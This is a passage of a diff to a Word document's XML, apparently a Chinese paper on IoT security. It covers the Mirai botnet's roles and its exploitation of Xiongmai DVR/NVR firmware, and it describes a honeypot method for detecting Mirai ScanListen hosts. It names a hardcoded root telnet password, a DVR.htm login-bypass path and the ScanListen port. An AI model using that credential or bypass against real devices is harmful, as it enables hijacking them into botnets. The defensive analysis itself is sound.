-              <w:bCs/>
+              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+              <w:kern w:val="0"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
             </w:rPr>
             <w:fldChar w:fldCharType="begin"/>
           </w:r>
           <w:r>
             <w:rPr>
-              <w:bCs/>
+              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+              <w:kern w:val="0"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
             </w:rPr>
             <w:instrText xml:space="preserve"> </w:instrText>
           </w:r>
           <w:r>
             <w:rPr>
-              <w:rFonts w:hint="eastAsia"/>
-              <w:bCs/>
+              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+              <w:kern w:val="0"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
             </w:rPr>
             <w:instrText>CITATION 李东宏16 \l 2052</w:instrText>
           </w:r>
           <w:r>
             <w:rPr>
-              <w:bCs/>
+              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+              <w:kern w:val="0"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
             </w:rPr>
             <w:instrText xml:space="preserve"> </w:instrText>
           </w:r>
           <w:r>
             <w:rPr>
-              <w:bCs/>
+              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+              <w:kern w:val="0"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
             </w:rPr>
             <w:fldChar w:fldCharType="separate"/>
           </w:r>
           <w:r>
             <w:rPr>
-              <w:rFonts w:hint="eastAsia"/>
-              <w:bCs/>
+              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
               <w:noProof/>
+              <w:kern w:val="0"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
             </w:rPr>
             <w:t xml:space="preserve"> </w:t>
           </w:r>
           <w:r>
             <w:rPr>
+              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
               <w:noProof/>
-            </w:rPr>
-            <w:t>[10]</w:t>
-          </w:r>
-          <w:r>
-            <w:rPr>
-              <w:bCs/>
+              <w:kern w:val="0"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
+            </w:rPr>
+            <w:t>[12]</w:t>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+              <w:kern w:val="0"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
             </w:rPr>
             <w:fldChar w:fldCharType="end"/>
           </w:r>
         </w:sdtContent>
       </w:sdt>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420"/>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>以雄迈的NetSurveillance和CMS系列为例，所有的</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>DVR/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>NVR CMS固件，都开放了telnet服务且不能被禁用。</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>针对Dyn的DDoS攻击中</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>，</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>有相当一部分流量来自于雄迈生产的设备</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>。</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>固件内置的登录账号“root”有一个不可变的硬编码密码xc3511。Mirai病毒利用这个弱口令远程控制雄迈的安防设备。</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>除了硬编码问题，雄迈许多产品的固件还有越权访问漏洞。因为没有对DVR.htm页面进行校验，攻击者可以绕过登录界面，直接访问DVR.htm，导致视频信息泄漏。Mirai病毒变种利用这个绕过漏洞远程控制雄迈的安防设备</w:t>
+      </w:r>
+      <w:sdt>
+        <w:sdtPr>
+          <w:rPr>
+            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+            <w:kern w:val="0"/>
+            <w:sz w:val="24"/>
+            <w:szCs w:val="24"/>
+          </w:rPr>
+          <w:id w:val="-1462488195"/>
+          <w:citation/>
+        </w:sdtPr>
+        <w:sdtContent>
+          <w:r>
+            <w:rPr>
+              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+              <w:kern w:val="0"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
+            </w:rPr>
+            <w:fldChar w:fldCharType="begin"/>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+              <w:kern w:val="0"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
+            </w:rPr>
+            <w:instrText xml:space="preserve"> </w:instrText>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+              <w:kern w:val="0"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
+            </w:rPr>
+            <w:instrText>CITATION 匡恩网16 \l 2052</w:instrText>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+              <w:kern w:val="0"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
+            </w:rPr>
+            <w:instrText xml:space="preserve"> </w:instrText>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+              <w:kern w:val="0"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
+            </w:rPr>
+            <w:fldChar w:fldCharType="separate"/>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+              <w:noProof/>
+              <w:kern w:val="0"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
+            </w:rPr>
+            <w:t xml:space="preserve"> </w:t>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+              <w:noProof/>
+              <w:kern w:val="0"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
+            </w:rPr>
+            <w:t>[13]</w:t>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+              <w:kern w:val="0"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
+            </w:rPr>
+            <w:fldChar w:fldCharType="end"/>
+          </w:r>
+        </w:sdtContent>
+      </w:sdt>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420"/>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Mirai</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>僵尸网络包含如下角色：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="aa"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="23"/>
+        </w:numPr>
+        <w:ind w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Bot</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>扫描执行</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>；</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>DDoS执行</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="aa"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="23"/>
+        </w:numPr>
+        <w:ind w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>ScanListen</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>收集扫描结果</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="aa"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="23"/>
+        </w:numPr>
+        <w:ind w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Load</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>植入恶意程序</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="aa"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="23"/>
+        </w:numPr>
+        <w:ind w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>C2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>：下发DDoS指令</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420"/>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>ScanListen开放端口</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>TCP/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>48101</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>，</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>B</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>ot会同此端口通信以上报</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>成功的</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>扫描结果，</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>进而交付Load模块进行恶意程序植入，</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>可据此</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>检测</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>疑似</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>ScanListen主机。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420"/>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>泰格实验室</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>设立了蜜罐对Mirai进行了检测</w:t>
+      </w:r>
+      <w:sdt>
+        <w:sdtPr>
+          <w:rPr>
+            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+            <w:kern w:val="0"/>
+            <w:sz w:val="24"/>
+            <w:szCs w:val="24"/>
+          </w:rPr>
+          <w:id w:val="-287517253"/>
+          <w:citation/>
+        </w:sdtPr>
+        <w:sdtContent>
+          <w:r>
+            <w:rPr>
+              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+              <w:kern w:val="0"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
+            </w:rPr>
+            <w:fldChar w:fldCharType="begin"/>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+              <w:kern w:val="0"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
+            </w:rPr>
+            <w:instrText xml:space="preserve"> </w:instrText>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+              <w:kern w:val="0"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
+            </w:rPr>
+            <w:instrText>CITATION 泰格实17 \l 2052</w:instrText>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+              <w:kern w:val="0"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
+            </w:rPr>
+            <w:instrText xml:space="preserve"> </w:instrText>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+              <w:kern w:val="0"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
+            </w:rPr>
+            <w:fldChar w:fldCharType="separate"/>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+              <w:noProof/>
+              <w:kern w:val="0"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
+            </w:rPr>
+            <w:t xml:space="preserve"> </w:t>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+              <w:noProof/>
+              <w:kern w:val="0"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
+            </w:rPr>
+            <w:t>[14]</w:t>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+              <w:kern w:val="0"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
+            </w:rPr>
+            <w:fldChar w:fldCharType="end"/>
+          </w:r>
+        </w:sdtContent>
+      </w:sdt>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>。他们</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>伪装成Bot，同疑似ScanListen通信，声称发现了蜜罐主机的Telnet口令，该口令为一个复杂的不重复口令。如果对方</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>确为</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>ScanListen并上套，会对蜜罐进行入侵，从而暴露自己</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>，</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>则可</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
